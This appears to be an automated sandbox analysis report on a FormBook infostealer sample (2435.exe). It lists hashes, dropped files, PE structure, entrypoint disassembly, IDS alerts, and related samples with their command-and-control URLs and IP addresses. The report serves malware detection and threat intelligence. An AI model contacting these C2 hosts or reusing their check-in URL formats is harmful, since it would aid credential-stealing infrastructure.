                                            • www.greenshirecommons.com/un8c/?8p=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwuwR4xQFHfof&h6Z=FZOTUTGPt4-
                                            fD56g4DRzG.exeGet hashmaliciousBrowse
                                            • www.frontpagesweb.net/w88t/?1bWl=DwAbJomwIIUam/8Lxif0xJyCLP0/MlDCQn/X6EWMKnqqCjXzJeuBHxh9ROI30kSy7fCE&z6z=STRxNL2x
                                            malware300.docmGet hashmaliciousBrowse
                                            • ww25.gokeenakte.top/admin.php?f=1&subid1=20210605-2000-3553-b2c5-4eab817b0105
                                            Payment.exeGet hashmaliciousBrowse
                                            • www.digitalgamerentals.com/ngvm/?3fl00=eXBfF5JabAMvoJeV+Y5ra8EK8SdWvzGjXwXzLVFQuPc9hZ/16jkYHGAZEYy2Tm7CaklT&9rdLfJ=i48HtpdXmp
                                            PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                            • www.chrispricellc.com/owws/?y8z=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6zNTHuB4YMFv&UDKPKv=04i8JpzhsHVX
                                            Order.exeGet hashmaliciousBrowse
                                            • www.sweeneysservicecenter.com/jogt/?w6ATB0=U2LhZ94w5IDC+2DErQbRlpD/OzsCIaT6lUf8FwZRqb7l7kFTMUkxaoKrt4WuZdpJEkCM&Jxox=Er6tXhMxl
                                            INQ-741-020621-PDF.exeGet hashmaliciousBrowse
                                            • www.hairgrowinggenius.com/pb93/?a0GLMhc=KPEvW4YRciSJiJFFNYizsATDgsgPxpmwnLISCA8VBLwfqs8m2gzQMN5Q9cE7knzB0ifR&rTqL5=0DKH1VwxRB
                                            CONTAINER DEPOSIT.exeGet hashmaliciousBrowse
                                            • www.northsytyle.com/dxe/?nPRT_Pn=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W&k6Ad3=_vc0KnhxhJu
                                            Swift copy_9808.exeGet hashmaliciousBrowse
                                            • www.scientiagenus.com/p6nu/?C2JdTP=eE7I+Sv8iOFRLyMlwLdgwXijBECgGV3UTircOP7TdIwQdQ324QcldvmuNHuZw5leTbqh&z6nHM=ITnT9Fg
                                            #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                            • www.jobswithsecurityclearance.com/pux4/?Lv0h=3mylV7pVONTMNM6aC/niqCihOZ2+qzoqaVpusSVEetlxoEhqYhjCa0mWM/mNyWLbLdeFpUieiA==&VlKt=wBNl4pd0L
                                            Pdf Scen Invoice 17INV06003.exeGet hashmaliciousBrowse
                                            • www.friendsed.com/s5cm/?O2=aT8vL+GQ5CKbWMYK7VfKTGSzb4SrkpvWRcVzxRDty813pzzqsjZ5NUDQNQmBAQnsw0DU&2d=YX9ti2PX
                                            ORDER LIST.pdf.exeGet hashmaliciousBrowse
                                            • www.chrispricellc.com/owws/?t8l=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6whQbeNAVt45EvY6Zw==&YBZL=lxldV
                                            quote.pdf.exeGet hashmaliciousBrowse
                                            • www.chrispricellc.com/owws/?rVEx8D=S0GhCH&RR=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6whpEvtDb7k+EvY9KA==
                                            hrUbr1mLqzggh0H.exeGet hashmaliciousBrowse
                                            • www.poltgroup.com/onqm/?6l=doD+GTTuj0wR7cILLxImcVYaTf1RJOz68mAknHdMm+lQBhaMdEcvcwimwgDNMMFRe7JRpz2F8Q==&2dm=3fklvpq0OPLdJVy
                                            packa.....(1).exeGet hashmaliciousBrowse
                                            • www.educationstarcorp.com/wdva/?kfD4qZ=xabDW6gRomVRJCfQhE+1Y8vLHDgRz3GtPRqb2ZQ8ev+ZOg56Covo/3nqdMEaAH6lCy+g&kr0=dbF0vFoPNvL
                                            Pdf MT103 - Remittance.pdf.exeGet hashmaliciousBrowse
                                            • www.ultimateplumpudding.co.uk/s5cm/?kR-4q=E2OK2mHSQGkTABA7rh5rFu9YJ97LBg918ZBY5I6VyKJbM1VF4fyc5eTvcYaTxAWeq+U4CfyJeQ==&P0D=Atxturd
                                            henry.exeGet hashmaliciousBrowse
                                            • www.booster.guru/aipc/?MZg=BMi4rIX3OaRmAVdWmHwDy158GXvJowW6rsMkLX8T/SeurUfZZjefoMGqIKxJ2f9Kzzfm&zTxX=ApdHHR
                                            Ohki Blower Skid Base Enquiry 052521.exeGet hashmaliciousBrowse
                                            • www.greenshirecommons.com/un8c/?vR=Ltxx&5j9=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwtQB3QA9Z6BY
                                            porosi e re Fature Proforma.exeGet hashmaliciousBrowse
                                            • www.fux.xyz/nt8e/?v2Mp4=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLtt2QtFrhXJ5&jJBP5D=-ZpPy
                                            CamScanner 24.05.2021 10.01.exeGet hashmaliciousBrowse
                                            • www.pacificsoucre.com/ainq/?Nji0Xf=8p7tvpAP&mlvx=pIngp1ZjDfSyLzoneSC3xwzm0h2uYzOW09iGJacWdr+L3f1uJRS1s7wexdcfTOtLplEo
                                            170.39.76.111Proof of Payment.bat.exeGet hashmaliciousBrowse
                                            • www.houseofsisson.com/dxe/?9rTd=b89ptlBx&F48lVPl=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH0luWFwfr74U

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            www.northsytyle.comCONTAINER DEPOSIT.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            03003 NAVEENA.exeGet hashmaliciousBrowse
                                            • 199.59.242.153

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            BODIS-NJUS] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            fD56g4DRzG.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            malware300.docmGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            Payment.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            Order.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            INQ-741-020621-PDF.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            CONTAINER DEPOSIT.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            Swift copy_9808.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            S5.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            Pdf Scen Invoice 17INV06003.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            ORDER LIST.pdf.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            quote.pdf.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            hrUbr1mLqzggh0H.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            packa.....(1).exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            Pdf MT103 - Remittance.pdf.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            henry.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            Ohki Blower Skid Base Enquiry 052521.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            porosi e re Fature Proforma.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            PETRONAS-BHD-AS-APPetroliamNasionalBerhadMYProof of Payment.bat.exeGet hashmaliciousBrowse
                                            • 170.39.76.111
                                            networkserviceGet hashmaliciousBrowse
                                            • 170.38.30.47

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dllINVOICE.exeGet hashmaliciousBrowse
                                              Shipment Invoice & Consignment Notification.exeGet hashmaliciousBrowse
                                                KY4cmAI0jU.exeGet hashmaliciousBrowse
                                                  5t2CmTUhKc.exeGet hashmaliciousBrowse
                                                    8qdfmqz1PN.exeGet hashmaliciousBrowse
                                                      New Order PO2193570O1.docGet hashmaliciousBrowse
                                                        L2.xlsxGet hashmaliciousBrowse
                                                          Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                            New Order PO2193570O1.pdf.exeGet hashmaliciousBrowse
                                                              2320900000000.exeGet hashmaliciousBrowse
                                                                CshpH9OSkc.exeGet hashmaliciousBrowse
                                                                  5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                                    i6xFULh8J5.exeGet hashmaliciousBrowse
                                                                      AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                                        090049000009000.exeGet hashmaliciousBrowse
                                                                          dYy3yfSkwY.exeGet hashmaliciousBrowse
                                                                            PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsxGet hashmaliciousBrowse
                                                                              Purchase Order Price List 061021.xlsxGet hashmaliciousBrowse
                                                                                Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                  UGGJ4NnzFz.exeGet hashmaliciousBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\7us089c3e295ppclg6d9
                                                                                    Process:C:\Users\user\Desktop\2435.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):185856
                                                                                    Entropy (8bit):7.99888602903792
                                                                                    Encrypted:true
                                                                                    SSDEEP:3072:65VNf/TDZwRRAkO7E7kbp7Vl9t2LhmgKWRqzMZa13EF9vEA5zTreL2aO+O+Ln5kB:4VNf/TDZwRWemHih7dR+h13Ev8AJTreq
                                                                                    MD5:1627D711EE3FADA81CB858B5682C85D2
                                                                                    SHA1:EFB13FDD0B52CF4E38DB413F55E32499CCEA29C7
                                                                                    SHA-256:3022E519B47BD426CB96248689E855D363BA2F4EBB55F77CF5507AB2E6738EB8
                                                                                    SHA-512:81D0E226A8BD6F51248B4A9E8B955B03DA877637DBBA101BE4B374F0C80EBFE226AF3D3D1F5D18E8A6429F54B9634363E4A8BF2B8D56CAA549DCC14F54AA1AC5
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: ....X%....}.C_Z.8.......X...+.&...|e..,..A1a..j........h.........."..=P5.*...p.....O...0+H1..E?.N....w..VM...j.Z.ss..i..m.~....../...d_.B,...v{..(b..5w.>..'.1d.D.gd...6....U.7....3Y....d...{c8.6.;......?....F....n..6.x.[.N.B........X.H..f._.;LL....sX........R..D..w...?....oA#SWO.N.s"....b 0I.H..od..:...v.$...=.<mc...8.2SX\...]F.2.....>a...%..L..\....}....[ek.+...=l\S.H...........k.h......3........TK...0"Y.'..x`.j.6.{.lj..1Ve/.V....7{.......GL..8..D..OZ..%....Q.......uY..*.{..H.O.Z0&..1@G.{k+baxKr...3....>.)....IB.....1.w..1.pm.........\. ..q....FuXK..X5.fJ.o.9B...O....E.nz.]..i.......X[k.lY.(&...m.D..9TQm$...L7..;rF$...>q........P.....0W..L.....4.G.2..E.R./#..A....6.d......yk.Ns.]p..5...qnK.H.*...1H......l..........<}&.r..5..%....n..O..:.T}..q.i....;7...<....x..Z....P.L..u&.r.o..m..s.....q6..g.G...KX9....w-.L#[.D\...O..[....V...@.1...{...LDV<W.wG.Y...^.=.(..7.W..V.<...'hh..k.t....../....MU....R......G...../..P5.rSM 0T.
                                                                                    C:\Users\user\AppData\Local\Temp\nsq165.tmp
                                                                                    Process:C:\Users\user\Desktop\2435.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):282767
                                                                                    Entropy (8bit):7.422689004181164
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:ydiVNf/TDZwRWemHih7dR+h13Ev8AJTreji+iLBB02OVaDut:1xFwE/mZRKEv8AVejqLBBFOVAm
                                                                                    MD5:2213022F76B392D6513DB66830C31224
                                                                                    SHA1:F6E1A73360DE6224A5ADB6A72486DACD7D8680C1
                                                                                    SHA-256:F47B6AB6DFAC7A60DEEC2078801BFF19C808BB3485E6A56A9214FE81F979A1A7
                                                                                    SHA-512:D1E4C16D19F210FB0E2F93BB652BA8D9F0F05985BECE148BF075A233A394B20B8FA303CDEE1CFC5B80E3A3B628F65A1B6ABF1C5B0C31525A969F04DFD6757499
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: .m......,.......................LP......8l.......m..............................................................#...........................................................................................................................................................................J...................j...........................................................................................................................................W...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll
                                                                                    Process:C:\Users\user\Desktop\2435.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11776
                                                                                    Entropy (8bit):5.855045165595541
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                    MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                    SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                    SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                    SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: INVOICE.exe, Detection: malicious, Browse
                                                                                    • Filename: Shipment Invoice & Consignment Notification.exe, Detection: malicious, Browse
                                                                                    • Filename: KY4cmAI0jU.exe, Detection: malicious, Browse
                                                                                    • Filename: 5t2CmTUhKc.exe, Detection: malicious, Browse
                                                                                    • Filename: 8qdfmqz1PN.exe, Detection: malicious, Browse
                                                                                    • Filename: New Order PO2193570O1.doc, Detection: malicious, Browse
                                                                                    • Filename: L2.xlsx, Detection: malicious, Browse
                                                                                    • Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious, Browse
                                                                                    • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: 2320900000000.exe, Detection: malicious, Browse
                                                                                    • Filename: CshpH9OSkc.exe, Detection: malicious, Browse
                                                                                    • Filename: 5SXTKXCnqS.exe, Detection: malicious, Browse
                                                                                    • Filename: i6xFULh8J5.exe, Detection: malicious, Browse
                                                                                    • Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse
                                                                                    • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                    • Filename: dYy3yfSkwY.exe, Detection: malicious, Browse
                                                                                    • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious, Browse
                                                                                    • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious, Browse
                                                                                    • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                    • Filename: UGGJ4NnzFz.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\sbmborptcxfjep
                                                                                    Process:C:\Users\user\Desktop\2435.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):57185
                                                                                    Entropy (8bit):4.984632645340986
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:/7VNqmd/WNWRdN9UKYDnr3ArvJcXBFRW45fZ2SjL0djJsa7FqkcKHqTW4ipLc4+C:Hb/W4dNmr34vSXR5h2O0Dsa7k8p+UQS
                                                                                    MD5:D3A1658292AB20E82B114799AE33644E
                                                                                    SHA1:71FFB4BCD29917B2E177AFA1D5B9B30056DA6FA6
                                                                                    SHA-256:AD00C8FCF5DCE9F7CDA163E7746E1070BDC50F0791664731F8F9AA226741E57E
                                                                                    SHA-512:DB81E4EAC967E36DF3115A51F628492D8EC369D34202ECA31BCE6A8C0974B585F7866EBE7668AC9C5309EC3CAACEEB57023C1C3C1F72F13DA0DB7D9F1EC045F8
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: U... ...#........>...........u.....e.....e.................9...........'.....a.....e.................9...........9...........\.....e.....e.......................e.......................u.....e.....e.....e...........................................................e...........s. .....!.....".....#...#.$...e.%...e.&.....'.....(.....).....*.....+.....,.....-.........../.....0.....1.....2.....3.....4...8.5...A.6.....7.....8...%.9.....:...e.;...e.<...e.=.....>.....?.....@...d.A...d.B...d.C.....D.....E...!.F.....G.....H...%.I...e.J.....K...s.L.....M.....N...!.O...#.P...e.Q...e.R.....S.....T...!.U.....V.....W.....X...!.Y.....Z.....[...%.\.....].....^....._...%.`...8.a...A.b.....c.....d.....e...].f...e.g...e.h...e.i.....j.....k.....l...d.m...d.n...d.o.....p.....q.....r.....s.....t.....u...e.v.....w...s.x.....y.....z.....{...#.|...e.}...e.~................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.92290852118761
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:2435.exe
                                                                                    File size:241748
                                                                                    MD5:862b4c2abad2c07ac13d5e051c18ab86
                                                                                    SHA1:c78f0a59312c7902e445c5a31d4896907e96475c
                                                                                    SHA256:c347c2d7579053d263f6ab6eddca7bd03691ebab93b30b5caba462caa7106beb
                                                                                    SHA512:a4972c953b97e257c9c86528aa948b38dd4bcdef0cb2e1c5a661be864ce9d305efc499f40c8e2e9187541200df5b81c5e1c364a6a5169003357ae912596425f9
                                                                                    SSDEEP:6144:Ds9e9CRE9m5SmMZ0AQV3Xtx4abWIj9Jtbs:yemUlmMKAQp9tpjPtbs
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                    File Icon

                                                                                    Icon Hash:b2a88c96b2ca6a72

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x40323c
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:099c0646ea7282d232219f8807883be0

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    sub esp, 00000180h
                                                                                    push ebx
                                                                                    push ebp
                                                                                    push esi
                                                                                    xor ebx, ebx
                                                                                    push edi
                                                                                    mov dword ptr [esp+18h], ebx
                                                                                    mov dword ptr [esp+10h], 00409130h
                                                                                    xor esi, esi
                                                                                    mov byte ptr [esp+14h], 00000020h
                                                                                    call dword ptr [00407030h]
                                                                                    push 00008001h
                                                                                    call dword ptr [004070B4h]
                                                                                    push ebx
                                                                                    call dword ptr [0040727Ch]
                                                                                    push 00000008h
                                                                                    mov dword ptr [00423F58h], eax
                                                                                    call 00007FEC80AE5A6Eh
                                                                                    mov dword ptr [00423EA4h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 00000160h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 0041F458h
                                                                                    call dword ptr [00407158h]
                                                                                    push 004091B8h
                                                                                    push 004236A0h
                                                                                    call 00007FEC80AE5721h
                                                                                    call dword ptr [004070B0h]
                                                                                    mov edi, 00429000h
                                                                                    push eax
                                                                                    push edi
                                                                                    call 00007FEC80AE570Fh
                                                                                    push ebx
                                                                                    call dword ptr [0040710Ch]
                                                                                    cmp byte ptr [00429000h], 00000022h
                                                                                    mov dword ptr [00423EA0h], eax
                                                                                    mov eax, edi
                                                                                    jne 00007FEC80AE2E6Ch
                                                                                    mov byte ptr [esp+14h], 00000022h
                                                                                    mov eax, 00429001h
                                                                                    push dword ptr [esp+14h]
                                                                                    push eax
                                                                                    call 00007FEC80AE5202h
                                                                                    push eax
                                                                                    call dword ptr [0040721Ch]
                                                                                    mov dword ptr [esp+1Ch], eax
                                                                                    jmp 00007FEC80AE2EC5h
                                                                                    cmp cl, 00000020h
                                                                                    jne 00007FEC80AE2E68h
                                                                                    inc eax
                                                                                    cmp byte ptr [eax], 00000020h
                                                                                    je 00007FEC80AE2E5Ch
                                                                                    cmp byte ptr [eax], 00000022h
                                                                                    mov byte ptr [eax+eax+00h], 00000000h

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                    .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                    RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                    RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                    RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                    RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                    RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                    Imports

                                                                                    DLLImport
                                                                                    KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                    SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                    ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    06/11/21-12:13:57.288476TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.5199.59.242.153
                                                                                    06/11/21-12:13:57.288476TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.5199.59.242.153
                                                                                    06/11/21-12:13:57.288476TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.5199.59.242.153
                                                                                    06/11/21-12:14:18.417415TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.534.102.136.180
                                                                                    06/11/21-12:14:18.417415TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.534.102.136.180
                                                                                    06/11/21-12:14:18.417415TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.534.102.136.180
                                                                                    06/11/21-12:14:18.562024TCP1201ATTACK-RESPONSES 403 Forbidden804972034.102.136.180192.168.2.5

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jun 11, 2021 12:13:57.109199047 CEST4971980192.168.2.5199.59.242.153
                                                                                    Jun 11, 2021 12:13:57.261039019 CEST8049719199.59.242.153192.168.2.5
                                                                                    Jun 11, 2021 12:13:57.261240005 CEST4971980192.168.2.5199.59.242.153
